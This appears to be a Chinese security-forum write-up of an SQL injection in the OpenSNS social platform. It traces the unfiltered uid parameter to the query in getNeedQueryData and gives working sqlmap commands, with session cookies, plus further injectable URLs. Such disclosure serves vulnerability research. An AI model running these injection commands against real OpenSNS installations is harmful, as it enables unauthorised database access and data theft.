0x01 前言

OpenSNS是基于OneThink的轻量级社交化用户中心框架,系统秉持简约的设计风格,注重交流,为用户提供了一套轻量级的社交方案。OpenSNS前身是“ThinkOX”,2015年1月28号正式更名为OpenSNS
OpenSNS采用PHP+MYSQL构建的一款有“身份”的开源免费SNS社交系统,适用于多种社会关系。
OpenSNS采用thinkphp框架编写。系统的设计遵循高内聚低耦合,允许管理员自由开启关闭功能模块。不仅如此,OpenSNS还内置了一个功能扩展商店,可以一键在线安装新的功能扩展。
OpenSNS目前有大量的国内开发者,云市场也上架了大量的第三方功能模块和主题应用,使OpenSNS可以同时满足各行各业的社交需求。

0x02 代码分析

跟踪到./Application/Ucenter/Controller/ConfigController.class.php中的_initialize方法

15 Line: 三元运算符判断是否设置了$_GET[‘uid’],若设置了则将其过滤一遍赋给$uid,若没有设置则获取session中得uid
17 Line: 调用当前类中得userInfo方法并将$uid传入

跟踪到./Application/Ucenter/Controller/ConfigController.class.php中的userInfo方法

1117 Line: 调用query_user并将数组及外部传入的$uid传入进去

跟踪到./Application/Common/Common/query_user.php中的query_user函数

17 Line: 判断$uid是否等于null,若等于则传入当前已经登陆用户的id否则使用传入的id并赋给$uid
18 Line: 调用模型Common/User中的query_user方法并将$fields、$uid传入

跟踪到./Application/Common/Model/UserModel.class.php中的query_user方法


118 Line: 将$user_data, $fields, $uid传入到当前类中的getNeedQueryData方法并将返回的数组分别赋值给$user_data, $fields

跟踪到./Application/Common/Model/UserModel.class.php中的getNeedQueryData方法

67 Line: 使用array_intersect函数返回$this->table_fields, $fields两个数组的交集并赋给$need_query中
69 Line: 判断$need_query不为空
70 Line: 获取数据表前缀并赋给$db_prefix
71 Line: 将外部传入外部传入的参数拼接到SQL语句中,在传入过程中并未有任何过滤

0x03 调试

漏洞出现在getNeedQueryData方法中的71行,调试开始咯!

0x04 漏洞复现

1、账号注册

2、登陆

3、祭出神器SQLMAP

sqlmap.py -u "http://localhost/index.php?s=/ucenter/Config/&uid=1*" --cookie " PHPSESSID=hvvkoc2sef0l1kemdrvnknd2s7; UM_distinctid=16bda55e991192-05e2b3083ccb28-1368624a-144000-16bda55e992c7; CNZZDATA1254932726=287816123-1562732483-%7C1562738136" --batch --technique=T --dbms "mysql"

sqlmap.py -u "http://localhost/index.php?s=/ucenter/Config/&uid=1*" --cookie " PHPSESSID=hvvkoc2sef0l1kemdrvnknd2s7; UM_distinctid=16bda55e991192-05e2b3083ccb28-1368624a-144000-16bda55e992c7; CNZZDATA1254932726=287816123-1562732483-%7C1562738136" --batch --technique=T --dbms "mysql" --is-dba

sqlmap.py -u "http://localhost/index.php?s=/ucenter/Config/&uid=1*" --cookie " PHPSESSID=hvvkoc2sef0l1kemdrvnknd2s7; UM_distinctid=16bda55e991192-05e2b3083ccb28-1368624a-144000-16bda55e992c7; CNZZDATA1254932726=287816123-1562732483-%7C1562738136" --batch --technique=T --dbms "mysql" --current-db

0x05 漏洞修复

0x06 同类注入点

http://localhost/index.php?s=/ucenter/index/index&uid=10
http://localhost/index.php?s=/ucenter/index/information&uid=10

点击收藏 | 0 关注 | 2
  • 动动手指,沙发就是你的了!
登录 后跟帖